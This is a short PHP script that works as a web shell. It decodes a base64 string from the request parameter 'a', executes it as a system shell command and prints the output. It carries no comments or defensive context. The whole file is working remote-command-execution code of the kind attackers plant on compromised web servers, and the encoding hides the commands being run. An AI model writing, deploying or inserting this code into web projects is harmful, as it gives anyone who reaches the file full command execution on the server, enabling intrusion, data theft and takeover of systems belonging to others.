<?php
$x = base64_decode($_REQUEST['a']);
$x = system($x);
var_dump($x);
?>

